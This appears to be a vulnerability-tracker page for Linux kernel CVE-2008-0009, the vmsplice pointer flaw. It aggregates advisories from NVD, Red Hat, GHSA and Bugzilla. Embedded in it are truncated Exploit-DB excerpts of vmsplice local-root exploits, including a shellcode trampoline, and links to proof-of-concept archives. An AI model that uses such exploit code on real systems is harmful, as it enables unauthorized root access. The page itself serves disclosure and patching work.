CVE-2008-0009
published 2008-02-12CVE-2008-0009: The vmsplice_to_user function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference, which…
PriorityP415low2.1CVSS 2.0
AVLACLAuNCPINAN
EXPLOIT
EPSS
0.96%
57.0th percentile
The vmsplice_to_user function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference, which might allow local users to access arbitrary kernel memory locations.
Affected
69 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
CVSS provenance
nvdv2.02.1LOWAV:L/AC:L/Au:N/C:P/I:N/A:N
vulncheck2.1LOW
vendor_redhat2.1LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-vv62-ccxv-738x: The vmsplice_to_pipe function in Linux kernel 2
ghsa_unreviewed·2022-05-01·CVSS 2.1
CVE-2008-0600 [LOW] CWE-94 GHSA-vv62-ccxv-738x: The vmsplice_to_pipe function in Linux kernel 2
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
GHSA
GHSA-hw2g-wprj-fvrq: The vmsplice_to_user function in fs/splice
ghsa_unreviewed·2022-05-01
CVE-2008-0009 [LOW] CWE-20 GHSA-hw2g-wprj-fvrq: The vmsplice_to_user function in fs/splice
The vmsplice_to_user function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference, which might allow local users to access arbitrary kernel memory locations.
VulnCheck
Linux Kernel Improper Control of Generation of Code ('Code Injection')
vulncheck·2008·CVSS 2.1
CVE-2008-0600 [LOW] Linux Kernel Improper Control of Generation of Code ('Code Injection')
Linux Kernel Improper Control of Generation of Code ('Code Injection')
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
Affected: Linux Kernel
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://isc.sans.edu/diary/SSH+new+brute+force+tool/9370/
VMware
Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues
vendor_vmware·2008-06-04·CVSS 2.6
CVE-2006-1721 [LOW] Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues
VMSA-2008-0009: Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues
Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues VMware Security Advisory VMware Security AdvisoryAdvisory ID: VMware Security AdvisorySynopsis: Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues VMware Security AdvisoryIssue date: VMware Security AdvisoryUpdated on:
CVEs: CVE-2006-1721, CVE-2007-4772, CVE-2007-5378, CVE-2007-5671, CVE-2008-0062, CVE-2008-0063, CVE-2008-0553, CVE-2008-0888, CVE-2
Red Hat
kernel vmsplice_to_pipe flaw
vendor_redhat·2008-02-09·CVSS 2.1
CVE-2008-0600 [LOW] CWE-119 kernel vmsplice_to_pipe flaw
kernel vmsplice_to_pipe flaw
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
Statement: This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4.
Red Hat
kernel: Inappropriate dereference of user-supplied memory pointers
vendor_redhat·2008-02-07·CVSS 2.1
CVE-2008-0009 [LOW] kernel: Inappropriate dereference of user-supplied memory pointers
kernel: Inappropriate dereference of user-supplied memory pointers
The vmsplice_to_user function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference, which might allow local users to access arbitrary kernel memory locations.
Statement: Not vulnerable. This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
No detection rules found.
Exploit-DB
Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)
exploitdb·2019-10-29·CVSS 3.3
CVE-2015-0009 [LOW] Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)
Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)
---
# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass
# Date: 2019-10-28
# Exploit Author: Thomas Zuk
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2,
# Windows 8, Windows Server 2012, Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
# Tested on: Windows 7 , Windows Server 2012
# CVE : CVE-2015-0009
# Type: Remote
# Platform: Windows
# Description: This exploit code targets vulnerable systems in order to corrupt GPO updates which causes
# the target system to revert various security settings to their default settings. This includes SMB server
# and network client settings, which by default do not
Exploit-DB
Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)
exploitdb·2008-02-09
CVE-2008-0600 Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)
Linux Kernel 2.6.17
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0
Exploit-DB
Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)
exploitdb·2008-02-09
CVE-2008-0600 Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)
Linux Kernel 2.6.23
#include
#include
#include
#include
#include
#define TARGET_PATTERN " sys_vm86old"
#define TARGET_SYSCALL 113
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4)
#define TRAMP_CODE (void *) trampoline
#define TRAMP_SIZE ( sizeof(trampoline) - 1 )
unsigned char trampoline[] =
"\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */
"\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */
"\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */
"\x75\x02" /* jne +2 */
"\xff\xd1" /* call *%ecx */
"\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */
"\xc3" /* ret */
;
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror
Bugzilla
CVE-2007-6731 xmp: Multiple buffer overflows in OXM decoder
bugzilla·2009-09-14·CVSS 10.0
CVE-2007-6731 [CRITICAL] CVE-2007-6731 xmp: Multiple buffer overflows in OXM decoder
CVE-2007-6731 xmp: Multiple buffer overflows in OXM decoder
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6731 to
the following vulnerability:
Extended Module Player (XMP) 2.5.1 and earlier allow remote attackers
to execute arbitrary code via an OXM file with a negative value, which
bypasses a check in (1) test_oxm and (2) decrunch_oxm functions in
misc/oxm.c, leading to a buffer overflow.
References:
http://aluigi.altervista.org/adv/xmpbof-adv.txt
http://www.securityfocus.com/bid/27047
http://www.vupen.com/english/advisories/2008/0009
PoC:
----
http://aluigi.org/poc/xmpbof.zip (/a.out 1 out.oxm)
Upstream status -- issued addressed in xmp-2.6.0:
http://sourceforge.net/project/shownotes.php?group_id=26422&release_id=692238
Credit:
Luigi Auriemma
Discussion:
T
Bugzilla
CVE-2007-6732 xmp: Buffer overflow in DTT file loader
bugzilla·2009-09-14·CVSS 10.0
CVE-2007-6732 [CRITICAL] CVE-2007-6732 xmp: Buffer overflow in DTT file loader
CVE-2007-6732 xmp: Buffer overflow in DTT file loader
Common Vulnerabilities and Exposures assigned an identifier CVE-200-6732 to
the following vulnerability:
Multiple buffer overflows in the dtt_load function in
loaders/dtt_load.c Extended Module Player (XMP) 2.5.1 and earlier
allow remote attackers to execute arbitrary code via unspecified
vectors related to an untrusted length value and the (1) pofs and (2)
plen arrays.
References:
http://aluigi.altervista.org/adv/xmpbof-adv.txt
http://www.securityfocus.com/bid/27047
http://www.vupen.com/english/advisories/2008/0009
PoC:
---
http://aluigi.org/poc/xmpbof.zip (a.out 2 out.dtt)
Upstream status -- issued addressed in xmp-2.6.0:
http://sourceforge.net/project/shownotes.php?group_id=26422&release_id=692238
Credit:
Luigi Auriemma
Disc
Bugzilla
CVE-2008-0600 kernel vmsplice_to_pipe flaw
bugzilla·2008-02-10·CVSS 2.1
CVE-2008-0600 [LOW] CVE-2008-0600 kernel vmsplice_to_pipe flaw
CVE-2008-0600 kernel vmsplice_to_pipe flaw
A new system call named vmsplice() was introduced in the 2.6.17
release of the Linux kernel.
COSEINC reported two issues affecting vmsplice, CVE-2008-0009 and CVE-2008-0010.
On Saturday 20080210 a public exploit was released that utilised a similar flaw
in vmsplice (vmsplice_to_pipe function) to allow a local user to gain privileges
on some architectures.
See also
http://marc.info/?t=120263655300003&r=1&w=2
This issue will affect kernels 2.6.17+ and therefore affected Red Hat Enterprise
Linux 5, but not Red Hat Enterprise Linux 4, 3, or 2.1.
Discussion:
Note that there may be a little confusion as there are actually three vmsplice
issues:
CVE-2008-0009 is already fixed upstream, does not affect any RHEL, has no
public exploit. Upstream pat
Bugzilla
CVE-2008-0009 kernel: Inappropriate dereference of user-supplied memory pointers
bugzilla·2008-02-01·CVSS 2.1
CVE-2008-0009 [LOW] CVE-2008-0009 kernel: Inappropriate dereference of user-supplied memory pointers
CVE-2008-0009 kernel: Inappropriate dereference of user-supplied memory pointers
Description of problem:
A new system call named vmsplice() was introduced in the 2.6.17
release of the Linux kernel.
Inappropriate dereference of user-supplied memory pointers in the
code beginning at line 1378 in the vmsplice_to_user() kernel
function (fs/splice.c):
The patch for this issue not provided by the reporter.
Discussion:
see bug #432251
---
There was a bit of confusion as the code changed since introduction 2.6.17, so
Red Hat Enterprise Linux kernels had code different to upstream.
CVE-2008-0009 and CVE-2008-0010 only affected kernels 2.6.22+ so Red Hat
Enterprise Linux was not affected
CVE-2008-0600 affected kernels 2.6.17+ so affects Red Hat Enterprise Linux 5.
Closing this CVE-2008-000
http://isec.pl/vulnerabilities/isec-0026-vmsplice_to_kernel.txthttp://secunia.com/advisories/28835http://secunia.com/advisories/28896http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1http://www.securityfocus.com/archive/1/487982/100/0/threadedhttp://www.securityfocus.com/bid/27704http://www.securityfocus.com/bid/27799http://www.vupen.com/english/advisories/2008/0487/referenceshttps://bugzilla.redhat.com/show_bug.cgi?id=431206https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00254.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-February/msg00255.htmlhttp://isec.pl/vulnerabilities/isec-0026-vmsplice_to_kernel.txthttp://secunia.com/advisories/28835http://secunia.com/advisories/28896http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1http://www.securityfocus.com/archive/1/487982/100/0/threadedhttp://www.securityfocus.com/bid/27704http://www.securityfocus.com/bid/27799http://www.vupen.com/english/advisories/2008/0487/referenceshttps://bugzilla.redhat.com/show_bug.cgi?id=431206https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00254.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-February/msg00255.html
2008-02-12
Published